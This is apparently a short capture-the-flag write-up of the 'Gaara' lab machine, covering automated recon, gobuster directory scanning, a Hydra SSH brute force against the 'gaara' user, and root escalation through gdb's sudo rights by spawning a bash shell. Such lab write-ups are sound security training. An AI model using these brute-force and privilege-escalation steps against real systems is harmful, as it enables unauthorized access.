Gaara (SSH Bruteforce)
June 3rd 2023
Target is 192.168.180.142
I installed auto recon to make recon automated as much as possible.
sudo env "PATH=$PATH" autorecon 192.168.180.142
Now to let it do it's thing (Loud as hell on an IDS so pentest only and NOT a redteam strategy!)
So SSH and http web. Checking out the site now.
Edgy sand guy from Naruto.
Checking source code
There is the email on the page that's kinda hard to read: email@example.com
Possible opening for social engineering on broken website and needing FTP access to fix it.
Using dirbuster since dirb crashed on me. Also stopped auto recon.
I like how bad dirbuster is with it's UI. Not large enough to show the start button.
Reset the vpn connection and now it's running. Used /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
50 Threads max. Anything more typically breaks connections
A search suggests running gobuster. Not my favorite since it requires actual command usage but here it is:
gobuster dir -u http://192.168.240.142 -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o dir.log
in the meantime it's worth trying to do a hydra bruteforce on the gaara name since it's the name of the website as well.
Also I need to keep in mind how many connectiong that the poor server can handle at once between directory discovery and ssh bruteforcing. Reduction of the attack to a sustainable volume is better than a uncapped number with a high failure rate.
Time to wait for Hydra to finish bruteforce SSH
Now to check for root privilege escalation via programs with sudo permissions:
Now to check against a list of ways to escalate based on unix binaries with sudo privileges:
Alright so gdb has sudo privleges and it's a debugger to run programs so let's escalate to root
Basically it runs a python bash shell through gdb
gdb is invoked, a standard debugger on Unix-like systems.
The -nx option tells gdb to not execute any commands from initialization files.
The -ex option is used to specify commands for gdb to execute.
A Python command is executed by gdb, which replaces the current gdb process with a new bash shell process.
The new bash shell process runs with the same privileges as the gdb process.
gdb is instructed to quit.
boot 2 root